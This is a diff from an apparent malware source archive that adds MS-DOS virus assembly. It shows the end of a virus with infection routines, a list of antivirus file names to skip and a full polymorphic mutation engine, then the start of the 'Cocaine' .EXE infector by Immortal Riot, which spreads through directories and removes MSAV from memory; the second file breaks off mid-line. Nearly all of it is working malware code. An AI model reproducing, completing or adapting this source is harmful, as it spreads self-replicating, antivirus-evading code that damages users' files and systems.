+;* Filenames to avoid +;****************************************************************************** + +names: db 'CO', 'SC', 'CL', 'VS', 'NE', 'HT', 'TB', 'VI' + db 'FI', 'GI', 'RA', 'FE', 'MT', 'BR', 'IM', ' ' + db ' ', ' ', ' ' + + +;****************************************************************************** +;* Write virus to the program +;****************************************************************************** + +writeprog: push ax ;save registers + push dx + push si + push bp + push es + + cli + mov word ptr [di-4],ss ;save SS & SP + mov word ptr [di-2],sp + + mov ax,cs ;new stack & buffer-segment + mov ss,ax + mov sp,((VIRPAR + WORKPAR) * 10) + add ax,low VIRPAR + mov es,ax + sti + + push ds + + mov bp,dx ;input parameters for engine + mov dx,0100 + mov cx,FILELEN + xor si,si + mov al,0Fh + + push di + push bx + + call crypt ;call the Engine + + pop bx + pop di + + push cx + push dx + mov ax,4202 ;goto end + xor cx,cx + cwd + int 21 + pop dx + pop cx + + mov ah,40 ;write virus + int 21 + cmp ax,cx ;are all bytes written? + + pop ds + + cli + mov ss,word ptr [di-4] ;restore stack + mov sp,word ptr [di-2] + sti + + pop es ;restore registers + pop bp + pop si + pop dx + pop ax + + ret + + +;****************************************************************************** +;* Adjust mem allocation info in EXE header +;****************************************************************************** + +mem_adjust: mov ax,[di] + sub ax,low FILEPAR ;alloc. may be this much less + jb more + cmp ax,DATAPAR ;minimum amount to allocate + jae mem_ok +more: mov ax,DATAPAR +mem_ok: mov [di],ax + ret + + +;****************************************************************************** +;* Read a few bytes +;****************************************************************************** + +readbytes: call goto + mov dx,offset minibuf + mov cx,4 +read: mov ah,3F + int 21 + ret + + +;****************************************************************************** +;* Calculate length for EXE header +;****************************************************************************** + +calclen: mov cx,0200 + div cx + or dx,dx + jz no_cor + inc ax +no_cor: ret + + +;****************************************************************************** +;* Get original length of program +;****************************************************************************** + +getlen: mov ax,[di] + mov dx,[di+2] + ret + + +;****************************************************************************** +;* Goto new offset DX:AX +;****************************************************************************** + +gotobegin: xor ax,ax + cwd +goto: xchg cx,dx + xchg ax,dx + mov ax,4200 + int 21 + ret + + +;**************************************************************************** +;* +;* Encryption Engine +;* +;* +;* Input: ES work segment +;* DS:DX code to encrypt +;* BP what will be start of decryptor +;* SI what will be distance between decryptor and code +;* CX length of code +;* AX flags: bit 0: DS will not be equal to CS +;* bit 1: insert random instructions +;* bit 2: put junk before decryptor +;* bit 3: preserve AX with decryptor +;* +;* Output: ES: work segment (preserved) +;* DS:DX decryptor + encrypted code +;* BP what will be start of decryptor (preserved) +;* DI length of decryptor / offset of encrypted code +;* CX length of decryptor + encrypted code +;* AX length of encrypted code +;* (other registers may be trashed) +;* +;**************************************************************************** + + db '[ MK / Trident ]' + +crypt: xor di,di ;di = start of decryptor + push dx ;save offset of code + push si ;save future offset of code + + mov byte ptr ds:[flags],al ;save flags + test al,8 ;push AX? + jz no_push + mov al,50 + stosb + +no_push: call rnd_get ;add a few bytes to cx + and ax,1F + add cx,ax + push cx ;save length of code + + call rnd_get ;get random flags + xchg ax,bx + ;BX flags: + + ;0,1 how to encrypt + ;2,3 which register for encryption + ;4 use byte or word for encrypt + ;5 MOV AL, MOV AH or MOV AX + ;6 MOV CL, MOV CH or MOV CX + ;7 AX or DX + + ;8 count up or down + ;9 ADD/SUB/INC/DEC or CMPSW/SCASW + ;A ADD/SUB or INC/DEC + ; CMPSW or SCASW + ;B offset in XOR instruction? + ;C LOOPNZ or LOOP + ; SUB CX or DEC CX + ;D carry with crypt ADD/SUB + ;E carry with inc ADD/SUB + ;F XOR instruction value or AX/DX + +random: call rnd_get ;get random encryption value + or al,al + jz random ;again if 0 + mov ds:[xor_val],ax + + call do_junk ;insert random instructions + + pop cx + + mov ax,0111 ;make flags to remember which + test bl,20 ; MOV instructions are used + jnz z0 + xor al,07 +z0: test bl,0C + jnz z1 + xor al,70 +z1: test bl,40 + jnz z2 + xor ah,7 +z2: test bl,10 + jnz z3 + and al,73 +z3: test bh,80 + jnz z4 + and al,70 + +z4: mov dx,ax +mov_lup: call rnd_get ;put MOV instructions in + and ax,000F ; a random order + cmp al,0A + ja mov_lup + + mov si,ax + push cx ;test if MOV already done + xchg ax,cx + mov ax,1 + shl ax,cl + mov cx,ax + and cx,dx + pop cx + jz mov_lup + xor dx,ax ;remember which MOV done + + push dx + call do_mov ;insert MOV instruction + call do_nop ;insert a random NOP + pop dx + + or dx,dx ;all MOVs done? + jnz mov_lup + + push di ;save start of decryptor loop + + call do_add_ax ;add a value to AX in loop? + call do_nop + test bh,20 ;carry with ADD/SUB ? + jz no_clc + mov al,0F8 + stosb +no_clc: mov word ptr ds:[xor_offset],0 + call do_xor ;place all loop instructions + call do_nop + call do_add + + pop dx ;get start of decryptor loop + + call do_loop + + test byte ptr ds:[flags],8 ;insert POP AX ? + jz no_pop + mov al,58 + stosb + +no_pop: xor ax,ax ;calculate loop offset + test bh,1 ;up or down? + jz v1 + mov ax,cx + dec ax + test bl,10 ;encrypt with byte or word? + jz v1 + and al,0FE +v1: add ax,di + add ax,bp + pop si + add ax,si + sub ax,word ptr ds:[xor_offset] + mov si,word ptr ds:[where_len] + test bl,0C ;are BL,BH used for encryption? + jnz v2 + mov byte ptr es:[si],al + mov si,word ptr ds:[where_len2] + mov byte ptr es:[si],ah + jmp short v3 +v2: mov word ptr es:[si],ax + +v3: mov dx,word ptr ds:[xor_val] ;encryption value + + pop si ;ds:si = start of code + + push di ;save ptr to encrypted code + push cx ;save length of encrypted code + + test bl,10 ;byte or word? + jz blup + + inc cx ;cx = # of crypts (words) + shr cx,1 + +lup: lodsw ;encrypt code (words) + call do_encrypt + stosw + loop lup + jmp short klaar + + +blup: lodsb ;encrypt code (bytes) + xor dh,dh + call do_encrypt + stosb + loop blup + +klaar: mov cx,di ;cx = length decryptpr + code + pop ax ;ax = length of decrypted code + pop di ;di = offset encrypted code + xor dx,dx ;ds:dx = decryptor + cr. code + push es + pop ds + ret + + +;**************************************************************************** +;* encrypt the code +;**************************************************************************** + +do_encrypt: add dx,word ptr ds:[add_val] + test bl,2 + jnz lup1 + xor ax,dx + ret + +lup1: test bl,1 + jnz lup2 + sub ax,dx + ret + +lup2: add ax,dx + ret + + +;**************************************************************************** +;* generate mov reg,xxxx +;**************************************************************************** + +do_mov: mov dx,si + mov al,byte ptr ds:[si+mov_byte] + cmp dl,4 ;BX? + jne is_not_bx + call add_ind +is_not_bx: test dl,0C ;A*? + pushf + jnz is_not_a + test bl,80 ;A* or D*? + jz is_not_a + add al,2 + +is_not_a: call alter ;insert the MOV + + popf ;A*? + jnz is_not_a2 + mov ax,word ptr ds:[xor_val] + jmp short sss + +is_not_a2: test dl,8 ;B*? + jnz is_not_b + mov si,offset where_len + test dl,2 + jz is_not_bh + add si,2 +is_not_bh: mov word ptr ds:[si],di + jmp short sss + +is_not_b: mov ax,cx ;C* + test bl,10 ;byte or word encryption? + jz sss + inc ax ;only half the number of bytes + shr ax,1 +sss: test dl,3 ;byte or word register? + jz is_x + test dl,2 ;*H? + jz is_not_h + xchg al,ah +is_not_h: stosb + ret + +is_x: stosw + ret + + +;**************************************************************************** +;* insert MOV or alternative for MOV +;**************************************************************************** + +alter: push bx + push cx + push ax + call rnd_get + xchg ax,bx + pop ax + test bl,3 ;use alternative for MOV? + jz no_alter + + push ax + and bx,0F + and al,08 + shl ax,1 + or bx,ax + pop ax + + and al,7 + mov cl,9 + xchg ax,cx + mul cl + + add ax,30C0 + xchg al,ah + test bl,4 + jz no_sub + mov al,28 +no_sub: call maybe_2 + stosw + + mov al,80 + call maybe_2 + stosb + + mov ax,offset add_mode + xchg ax,bx + and ax,3 + xlat + + add al,cl +no_alter: stosb + pop cx + pop bx + ret + + +;**************************************************************************** +;* insert ADD AX,xxxx +;**************************************************************************** + +do_add_ax: push cx + mov si,offset add_val ;save add-value here + mov word ptr ds:[si],0 + mov ax,bx + and ax,8110 + xor ax,8010 + jnz no_add_ax ;use ADD? + + mov ax,bx + xor ah,ah + mov cl,3 + div cl + or ah,ah + jnz no_add_ax ;use ADD? + + test bl,80 + jnz do_81C2 ;AX or DX? + mov al,5 + stosb + jmp short do_add0 +do_81C2: mov ax,0C281 + stosw +do_add0: call rnd_get + mov word ptr ds:[si],ax + stosw +no_add_ax: pop cx + ret + + +;**************************************************************************** +;* generate encryption command +;**************************************************************************** + +do_xor: test byte ptr ds:[flags],1 + jz no_cs + mov al,2E ;insert CS: instruction + stosb + +no_cs: test bh,80 ;type of XOR command + jz xor1 + + call get_xor ;encrypt with register + call do_carry + call save_it + xor ax,ax + test bl,80 + jz xxxx + add al,10 +xxxx: call add_dir + test bh,8 + jnz yyyy + stosb + ret + +yyyy: or al,80 + stosb + call rnd_get + stosw + mov word ptr ds:[xor_offset],ax + ret + +xor1: mov al,080 ;encrypt with value + call save_it + call get_xor + call do_carry + call xxxx + mov ax,word ptr ds:[xor_val] + test bl,10 + jmp byte_word + + +;**************************************************************************** +;* generate increase/decrease command +;**************************************************************************** + +do_add: test bl,8 ;no CMPSW/SCASW if BX is used + jz da0 + test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW + jnz do_cmpsw + +da0: test bh,4 ;ADD/SUB or INC/DEC? + jz add1 + + mov al,40 ;INC/DEC + test bh,1 ;up or down? + jz add0 + add al,8 +add0: call add_ind + stosb + test bl,10 ;byte or word? + jz return + stosb ;same instruction again +return: ret + +add1: test bh,40 ;ADD/SUB + jz no_clc2 ;carry? + mov al,0F8 ;insert CLC + stosb +no_clc2: mov al,083 + stosb + mov al,0C0 + test bh,1 ;up or down? + jz add2 + mov al,0E8 +add2: test bh,40 ;carry? + jz no_ac2 + and al,0CF + or al,10 +no_ac2: call add_ind + stosb + mov al,1 ;value to add/sub +save_it: call add_1 + stosb + ret + +do_cmpsw: test bh,1 ;up or down? + jz no_std + mov al,0FDh ;insert STD + stosb +no_std: test bh,4 ;CMPSW or SCASW? + jz normal_cmpsw + test bl,4 ;no SCASW if SI is used + jnz do_scasw + +normal_cmpsw: mov al,0A6 ;CMPSB + jmp short save_it +do_scasw: mov al,0AE ;SCASB + jmp short save_it + + +;**************************************************************************** +;* generate loop command +;**************************************************************************** + +do_loop: test bh,1 ;no JNE if couting down + jnz loop_loop ; (prefetch bug!) + call rnd_get + test al,1 ;LOOPNZ/LOOP or JNE? + jnz cx_loop + +loop_loop: mov al,0E0 + test bh,1A ;LOOPNZ or LOOP? + jz ll0 ; no LOOPNZ if xor-offset + add al,2 ; no LOOPNZ if CMPSW/SCASW +ll0: stosb + mov ax,dx + sub ax,di + dec ax + stosb + ret + +cx_loop: test bh,10 ;SUB CX or DEC CX? + jnz cxl_dec + mov ax,0E983 + stosw + mov al,1 + stosb + jmp short do_jne + +cxl_dec: mov al,49 + stosb +do_jne: mov al,75 + jmp short ll0 + + +;**************************************************************************** +;* add value to AL depending on register type +;**************************************************************************** + +add_dir: mov si,offset dir_change + jmp short xx1 + +add_ind: mov si,offset ind_change +xx1: push bx + shr bl,1 + shr bl,1 + and bx,3 + add al,byte ptr ds:[bx+si] + pop bx + ret + + +;**************************************************************************** +;* mov encryption command byte to AL +;**************************************************************************** + +get_xor: push bx + mov ax,offset how_mode + xchg ax,bx + and ax,3 + xlat + pop bx + ret + + +;**************************************************************************** +;* change ADD into ADC +;**************************************************************************** + +do_carry: test bl,2 ;ADD/SUB used for encryption? + jz no_ac + test bh,20 ;carry with (encr.) ADD/SUB? + jz no_ac + and al,0CF + or al,10 +no_ac: ret + + +;**************************************************************************** +;* change AL (byte/word) +;**************************************************************************** + +add_1: test bl,10 + jz add_1_ret + inc al +add_1_ret: ret + + +;**************************************************************************** +;* change AL (byte/word) +;**************************************************************************** + +maybe_2: call add_1 + cmp al,81 ;can't touch this + je maybe_not + push ax + call rnd_get + test al,1 + pop ax + jz maybe_not + add al,2 +maybe_not: ret + + +;**************************************************************************** +;* get random nop (or not) +;**************************************************************************** + +do_nop: test byte ptr ds:[flags],2 + jz no_nop +yes_nop: call rnd_get + test al,3 + jz nop8 + test al,2 + jz nop16 + test al,1 + jz nop16x +no_nop: ret + + +;**************************************************************************** +;* Insert random instructions +;**************************************************************************** + +do_junk: test byte ptr ds:[flags],4 + jz no_junk + call rnd_get ;put a random number of + and ax,0F ; dummy instructions before + inc ax ; decryptor + xchg ax,cx +junk_loop: call junk + loop junk_loop +no_junk: ret + + +;**************************************************************************** +;* get rough random nop (may affect register values) +;**************************************************************************** + +junk: call rnd_get + and ax,1E + jmp short aa0 +nop16x: call rnd_get + and ax,06 +aa0: xchg ax,si + call rnd_get + jmp word ptr ds:[si+junkcals] + + +;**************************************************************************** +;* NOP and junk addresses +;**************************************************************************** + +junkcals dw offset nop16x0 + dw offset nop16x1 + dw offset nop16x2 + dw offset nop16x3 + dw offset nop8 + dw offset nop16 + dw offset junk6 + dw offset junk7 + dw offset junk8 + dw offset junk9 + dw offset junkA + dw offset junkB + dw offset junkC + dw offset junkD + dw offset junkE + dw offset junkF + + +;**************************************************************************** +;* NOP and junk routines +;**************************************************************************** + +nop16x0: and ax,000F ;J* 0000 (conditional) + or al,70 + stosw + ret + + +nop16x1: mov al,0EBh ;JMP xxxx / junk + and ah,07 + inc ah + stosw + xchg al,ah ;get lenght of bullshit + cbw + jmp fill_bullshit + + +nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg + stosb + ret + + +nop16x3: call junkF ;INC / DEC or DEC / INC + xor al,8 + stosb + ret + + +nop8: push bx ;8-bit NOP + and al,7 + mov bx,offset nop_data8 + xlat + stosb + pop bx + ret + + +nop16: push bx ;16-bit NOP + and ax,0303 + mov bx,offset nop_data16 + xlat + add al,ah + stosb + call rnd_get + and al,7 + mov bl,9 + mul bl + add al,0C0 + stosb + pop bx + ret + + +junk6: push cx ;CALL xxxx / junk / POP reg + mov al,0E8 + and ah,0F + inc ah + stosw + xor al,al + stosb + xchg al,ah + call fill_bullshit + call do_nop + call rnd_get ;insert POP reg + and al,7 + call no_sp + mov cx,ax + or al,58 + stosb + + test ch,3 ;more? + jnz junk6_ret + + call do_nop + mov ax,0F087 ;insert XCHG SI,reg + or ah,cl + test ch,8 + jz j6_1 + mov al,8Bh +j6_1: stosw + + call do_nop + push bx + call rnd_get + xchg ax,bx + and bx,0F7FBh ;insert XOR [SI],xxxx + or bl,8 + call do_xor + pop bx +junk6_ret: pop cx + ret + + +junk7: and al,0F ;MOV reg,xxxx + or al,0B0 + call no_sp + stosb + test al,8 + pushf + call rnd_get + popf + jmp short byte_word + + +junk8: and ah,39 ;DO r/m,r(8/16) + or al,0C0 + call no_sp + xchg al,ah + stosw + ret + + +junk9: and al,3Bh ;DO r(8/16),r/m + or al,2 + and ah,3F + call no_sp2 + call no_bp + stosw + ret + + +junkA: and ah,1 ;DO rm,xxxx + or ax,80C0 + call no_sp + xchg al,ah + stosw + test al,1 + pushf + call rnd_get + popf + jmp short byte_word + + +junkB: call nop8 ;NOP / LOOP + mov ax,0FDE2 + stosw + ret + + +junkC: and al,09 ;CMPS* or SCAS* + test ah,1 + jz mov_test + or al,0A6 + stosb + ret +mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx + stosb + cmp al,0A8 + pushf + call rnd_get + popf + jmp short byte_word + + +junkD: and al,07 ;XCHG AX,reg + or al,90 + call no_sp + stosb + ret + + +junkE: and ah,07 ;PUSH reg / POP reg + or ah,50 + mov al,ah + or ah,08 + stosw + ret + + +junkF: and al,0F ;INC / DEC + or al,40 + call no_sp + stosb + ret + + +;**************************************************************************** +;* store a byte or a word +;**************************************************************************** + +byte_word: jz only_byte + stosw + ret + +only_byte: stosb + ret + + +;**************************************************************************** +;* don't fuck with SP! +;**************************************************************************** + +no_sp: push ax + and al,7 + cmp al,4 + pop ax + jnz no_sp_ret + and al,0FBh +no_sp_ret: ret + + +;**************************************************************************** +;* don't fuck with SP! +;**************************************************************************** + +no_sp2: push ax + and ah,38 + cmp ah,20 + pop ax + jnz no_sp2_ret + xor ah,20 +no_sp2_ret: ret + + +;**************************************************************************** +;* don't use [BP+..] +;**************************************************************************** + +no_bp: test ah,4 + jnz no_bp2 + and ah,0FDh + ret + +no_bp2: push ax + and ah,7 + cmp ah,6 + pop ax + jnz no_bp_ret + or ah,1 +no_bp_ret: ret + + +;**************************************************************************** +;* write byte for JMP/CALL and fill with random bullshit +;**************************************************************************** + +fill_bullshit: push cx + xchg ax,cx +bull_lup: call rnd_get + stosb + loop bull_lup + pop cx + ret + + +;**************************************************************************** +;* random number generator (stolen from 'Bomber') +;**************************************************************************** + +rnd_init: push cx + call rnd_init0 ;init + and ax,000F + inc ax + xchg ax,cx +random_lup: call rnd_get ;call random routine a few + loop random_lup ; times to 'warm up' + pop cx + ret + +rnd_init0: push dx ;initialize generator + push cx + mov ah,2C + int 21 + in al,40 + mov ah,al + in al,40 + xor ax,cx + xor dx,ax + jmp short move_rnd + +rnd_get: push dx ;calculate a random number + push cx + push bx + mov ax,0 ;will be: mov ax,xxxx + mov dx,0 ; and mov dx,xxxx + mov cx,7 +rnd_lup: shl ax,1 + rcl dx,1 + mov bl,al + xor bl,dh + jns rnd_l2 + inc al +rnd_l2: loop rnd_lup + pop bx + +move_rnd: mov word ptr ds:[rnd_get+4],ax + mov word ptr ds:[rnd_get+7],dx + mov al,dl + pop cx + pop dx + ret + + +;**************************************************************************** +;* tables for engine +;**************************************************************************** + + ; AX AL AH (BX) BL BH CX CL CH +mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 0B3, 0B7, 0, 0B9, 0B1, 0B5 + + ; nop clc stc cmc cli cld incbp decbp +nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh + + ; or and xchg mov +nop_data16 db 8, 20, 84, 88 + + ; bl/bh, bx, si di +dir_change db 07, 07, 04, 05 +ind_change db 03, 03, 06, 07 + + + ; xor xor add sub +how_mode db 30, 30, 00, 28 + + ; ? add xor or +add_mode db 0, 0C8, 0F0, 0C0 + + +;**************************************************************************** +;* text + buffer +;**************************************************************************** + + db ' Amsterdam = COFFEESHOP! ' + +buffer db 0CDh, 20 ;original code of dummy program + db (BUFLEN-2) dup (?) + + +;**************************************************************************** +;* the (packed) picture routine +;**************************************************************************** + +beeld db 0BFh, 0A1h, 015h, 090h, 090h, 090h, 090h, 090h + db 090h, 090h, 090h, 0BEh, 0F9h, 003h, 0B9h, 06Bh + db 001h, 0FDh, 0F3h, 0A5h, 0FCh, 08Bh, 0F7h, 0BFh + db 000h, 001h, 0ADh, 0ADh, 08Bh, 0E8h, 0B2h, 010h + db 0E9h, 036h, 014h, 04Fh, 08Fh, 07Fh, 0FCh, 0B4h + db 00Fh, 0CDh, 010h, 0B4h, 000h, 050h, 0FBh, 0B7h + db 0B0h, 03Ch, 007h, 074h, 0FFh, 0FFh, 00Ah, 03Ch + db 004h, 073h, 028h, 0B7h, 0B8h, 03Ch, 002h, 072h + db 022h, 08Eh, 0C3h, 0BEh, 040h, 001h, 0FFh, 0FFh + db 0B0h, 019h, 057h, 0B1h, 050h, 0F3h, 0A5h, 05Fh + db 081h, 0C7h, 0A0h, 000h, 0FEh, 0C8h, 075h, 0F2h + db 003h, 08Fh, 0B8h, 007h, 00Eh, 0D6h, 0FBh, 00Ch + db 0CDh, 021h, 058h, 0F8h, 063h, 0A7h, 0CBh, 020h + db 002h, 0FEh, 020h, 000h, 0FAh, 0EBh, 0B0h, 0FCh + db 0F8h, 003h, 077h, 0F0h, 0E0h, 0D0h, 041h, 00Fh + db 0C0h, 02Fh, 007h, 01Dh, 080h, 06Fh, 0BAh, 0DCh + db 0E1h, 034h, 0DBh, 00Ch, 0F8h, 0F0h, 00Eh, 0DFh + db 0FEh, 0F4h, 0F8h, 0BBh, 0AEh, 0F8h, 0E4h, 003h + db 084h, 0E0h, 0FCh, 0EBh, 0B0h, 0E6h, 0EAh, 0A3h + db 083h, 0DAh, 0AAh, 00Eh, 0DCh, 009h, 0BAh, 0C8h + db 001h, 03Ah, 0F0h, 050h, 007h, 0A2h, 0E8h, 0E0h + db 0ACh, 005h, 0DBh, 00Eh, 077h, 00Fh, 0F8h, 0DCh + db 0F6h, 0BAh, 0AEh, 0F0h, 0F6h, 0EBh, 03Ah, 0F0h + db 0F4h, 0E0h, 040h, 017h, 0FAh, 0ECh, 01Dh, 072h + db 0DFh, 0DAh, 0D2h, 074h, 0F8h, 0BAh, 0DDh, 020h + db 01Dh, 074h, 0DEh, 020h, 0AAh, 007h, 0BAh, 0D8h + db 061h, 0F8h, 047h, 087h, 0F8h, 0E8h, 0E1h, 0E8h + db 0F8h, 092h, 0F4h, 000h, 01Dh, 060h, 0D8h, 0E8h + db 009h, 0DCh, 0FEh, 009h, 0F8h, 0B0h, 023h, 0F8h + db 05Ch, 0D7h, 0FCh, 0F8h, 0FCh, 0E8h, 001h, 03Bh + db 0F4h, 0ECh, 080h, 0D2h, 01Dh, 0BEh, 0BAh, 05Ch + db 020h, 07Ch, 003h, 075h, 060h, 0CAh, 020h, 00Eh + db 0B2h, 0D8h, 081h, 0F0h, 03Bh, 040h, 092h, 0D7h + db 0B5h, 0CEh, 0F8h, 0DCh, 060h, 0A7h, 041h, 0DEh + db 060h, 002h, 0B5h, 0BEh, 03Ch, 020h, 00Fh, 07Bh + db 022h, 065h, 007h, 01Dh, 060h, 06Eh, 084h, 0CCh + db 0DFh, 00Dh, 020h, 0C0h, 0B3h, 020h, 02Fh, 060h + db 041h, 01Eh, 06Ah, 0DEh, 07Eh, 00Ah, 042h, 0E0h + db 009h, 0E4h, 0C0h, 075h, 030h, 060h, 00Bh, 0DFh + db 01Ch, 0F4h, 0E4h, 042h, 04Fh, 05Eh, 05Eh, 041h + db 09Ah, 022h, 006h, 02Bh, 01Ch, 080h, 060h, 03Eh + db 084h, 057h, 005h, 0CAh, 046h, 0A4h, 0D0h, 07Bh + db 053h, 07Ah, 097h, 005h, 015h, 0C2h, 004h, 020h + db 01Dh, 054h, 060h, 001h, 0C8h, 051h, 041h, 0E8h + db 0DCh, 006h, 054h, 0BEh, 077h, 0D8h, 02Dh, 078h + db 07Ah, 050h, 055h, 001h, 004h, 020h, 05Dh, 007h + db 076h, 02Eh, 0AEh, 03Ah, 0C6h, 062h, 0E8h, 0A0h + db 055h, 05Eh, 009h, 0A2h, 002h, 0C0h, 020h, 057h + db 084h, 0C6h, 0D0h, 004h, 01Dh, 02Ah, 05Dh, 05Eh + db 0D6h, 016h, 017h, 080h, 098h, 0A4h, 040h, 003h + db 050h, 0EAh, 0ACh, 05Dh, 005h, 062h, 0C4h, 01Dh + db 070h, 059h, 05Eh, 0C4h, 067h, 005h, 082h, 0DCh + db 020h, 002h, 005h, 060h, 020h, 0E4h, 090h, 062h + db 019h, 0D4h, 094h, 065h, 0ECh, 00Eh, 069h, 05Eh + db 0CFh, 007h, 0A0h, 070h, 020h, 0B0h, 0A2h, 0B2h + db 083h, 00Ah, 062h, 069h, 0CCh, 03Bh, 060h, 05Eh + db 0D5h, 002h, 0BEh, 080h, 070h, 090h, 062h, 004h + db 072h, 083h, 055h, 0FEh, 06Eh, 010h, 041h, 040h + db 041h, 0AEh, 0FEh, 0CEh, 075h, 034h, 09Eh, 0FEh + db 002h, 071h, 05Ch, 0BAh, 0AAh, 0E6h, 0CCh, 018h + db 072h, 0C0h, 062h, 040h, 00Eh, 06Ch, 07Bh, 047h + db 0F2h, 0BCh, 005h, 015h, 028h, 050h, 026h, 0E1h + db 070h, 0FEh, 052h, 05Fh, 068h, 009h, 0FEh, 0BEh + db 040h, 010h, 02Ah, 0F2h, 0AEh, 0E0h, 03Ah, 070h + db 0FEh, 0FCh, 06Ah, 04Ah, 050h, 0DEh, 061h, 0ACh + db 061h, 0C7h, 050h, 00Eh, 001h, 03Eh, 072h, 060h + db 048h, 08Eh, 00Ah, 06Ah, 096h, 03Ah, 0E8h, 002h + db 066h, 058h, 084h, 0B0h, 045h, 0B4h, 007h, 020h + db 05Ah, 0EAh, 0E9h, 0C0h, 044h, 02Dh, 060h, 0E8h + db 093h, 0A0h, 09Eh, 073h, 048h, 050h, 0C6h, 0FFh + db 0F0h, 041h, 0D3h, 0FFh, 060h, 040h, 001h, 0FFh + db 0D1h, 0EDh, 0FEh, 0CAh, 075h, 005h, 0ADh, 08Bh + db 0E8h, 0B2h, 010h, 0C3h, 0E8h, 0F1h, 0FFh, 0D0h + db 0D7h, 0E8h, 0ECh, 0FFh, 072h, 014h, 0B6h, 002h + db 0B1h, 003h, 0E8h, 0E3h, 0FFh, 072h, 009h, 0E8h + db 0DEh, 0FFh, 0D0h, 0D7h, 0D0h, 0E6h, 0E2h, 0F2h + db 02Ah, 0FEh, 0B6h, 002h, 0B1h, 004h, 0FEh, 0C6h + db 0E8h, 0CDh, 0FFh, 072h, 010h, 0E2h, 0F7h, 0E8h + db 0C6h, 0FFh, 073h, 00Dh, 0FEh, 0C6h, 0E8h, 0BFh + db 0FFh, 073h, 002h, 0FEh, 0C6h, 08Ah, 0CEh, 0EBh + db 02Ah, 0E8h, 0B4h, 0FFh, 072h, 010h, 0B1h, 003h + db 0B6h, 000h, 0E8h, 0ABh, 0FFh, 0D0h, 0D6h, 0E2h + db 0F9h, 080h, 0C6h, 009h, 0EBh, 0E7h, 0ACh, 08Ah + db 0C8h, 083h, 0C1h, 011h, 0EBh, 00Dh, 0B1h, 003h + db 0E8h, 095h, 0FFh, 0D0h, 0D7h, 0E2h, 0F9h, 0FEh + db 0CFh, 0B1h, 002h, 026h, 08Ah, 001h, 0AAh, 0E2h + db 0FAh, 0E8h, 084h, 0FFh, 073h, 003h, 0A4h, 0EBh + db 0F8h, 0E8h, 07Ch, 0FFh, 0ACh, 0B7h, 0FFh, 08Ah + db 0D8h, 072h, 081h, 0E8h, 072h, 0FFh, 072h, 0D6h + db 03Ah, 0FBh, 075h, 0DDh, 033h, 0EDh, 033h, 0FFh + db 033h, 0F6h, 033h, 0D2h, 033h, 0DBh, 033h, 0C0h + db 0E9h, 07Dh, 0EBh + +last: + +_TEXT ends + end first + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.coke.asm b/MSDOS/Virus.MSDOS.Unknown.coke.asm new file mode 100644 index 00000000..c7442a6e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.coke.asm @@ -0,0 +1,280 @@ +; Virus name : Cocaine [CoKe] +; Virus author: Metal Militia +; Virus group : Immortal Riot +; Origin : Sweden +; +; This is an non-resident, .EXE infector moving upwards using the +; "dot-dot" method. Watch your .EXE files for the bad guy siganture +; "IR" somewhere in the beginning, after the MZ or ZM thang.. :) +; +; Also, check your back for a "?" a bit from it aswell. Btw! Everytime +; you run it, it'll take out that fucking MSAV piece of shit from your +; memory. Im telling you, go get TB-SCAN or something instead of such +; hacked things. TB-Scan finds this virus as both Ear-6 and Burma but +; is not any sort of hack from them or something. I didn't had time to +; fix the encryption, and since this is just a test from me i really +; don't give a shit, but ofcause you're always welcome to keep +; developing it, heheh :) +; +; To add here, is that Ear-6 is non-res com/exe infector, umm.. that's +; Dark Angels virus, and this is not alike it! Burma is non-res ow-vir, +; and also not very much alike this anyhow.. However, i've heard about +; some resident, non-ow Burma aswell? Not sure on thatone. So, it'll +; probably only confuse some users, I guess.. Enjoy Insane Reality #4!! +; +;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +; COCAINE! [CoKE] +;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +.model tiny +.radix 16 +.code + org 100 +start: + mov blast,0fa01 ; Take MSAV's shit + mov dx,5945h ; out of the fucking + int 16 ; memory right away + + push ds ;Save old offset + + push cs ;Set ES/DS/CS + pop es + push cs + pop ds ;for data accessing. + + call get_offset ;This places the displace- + get_offset: ;ment of the virus from + pop bp ;its original compilation + sub bp,offset get_offset ;into BP. + + Reset_Variables: ;Reset XX_old values for + lea di,[IP_storage+bp] ;new infection. + lea si,[IP_old+bp] + call mov_it + call mov_it + call mov_it + call mov_it + jmp set_dta +mov_it: + movsw ; movsw + ret ; ret(urn) to caller + + Set_DTA: + lea dx,[New_DTA+bp] ;Set DTA to the after + mov ah,readin ;virus + int 21 + + mov ah,47h ; Get + mov dl,0 ; current + lea si,[bp+new_dta+2ch] ; directory + int 21h + + Find_first_file: + mov ah,4e ; Find first + lea dx,[bp+masker] ; .EXE file + + Find_File: + int 21 + jnc infeqt ; If found, infect + jmp ch_dir ; Else, change directoy + + Infeqt: + mov blast,3d02 ; Open file + lea dx,[bp+New_DTA+1e] ; 1eh = DTA place for filename + int 21 + + xchg bx,blast ; Or, mov ax,bx + + mov ah,3f ; Read in + mov mate,readin ; 1ah + lea dx,[bp+exe_header] ; to EXE header + int 21 + + cmp word ptr [bp+exe_header+0e],'RI' ; Check if already + je close_file ; infected. If so, + ; close and get nextone + call Save_Old_Header ; Save old header + + mov blast,4202 ; Go to the end of the file. + xor mate,mate + cwd + int 21 + + push blast + push dx + + call calculate_CSIP ; calculate virus startingpoint + + pop dx + pop blast + + call calculate_size ; calculate fsize for the header + + mov mate,end_virus-start ; viruscode + mov ah,svenne ; write it + lea dx,[bp+start] ; from start + int 21 ; to victim (uninfected file) + + mov blast,4200 ; Return to the beginning + xor mate,mate ; of the file. + cwd + int 21 + + mov mate,readin ; 1ah + mov ah,svenne ; write it + lea dx,[bp+exe_header] ; to the EXE header + int 21 + +Close_File: + mov ah,3e ; close the file + int 21 ; and go get the nextone + + Find_Next_File: + mov ah,4f ; find next file + jmp Find_File ; do it! + + No_More_Files: + mov ah,2a ; get date + int 21 + cmp dl,1 ; 1st of any month? + jne ret_to_host ; if not, outa here + + mov ah,9 ; print + lea 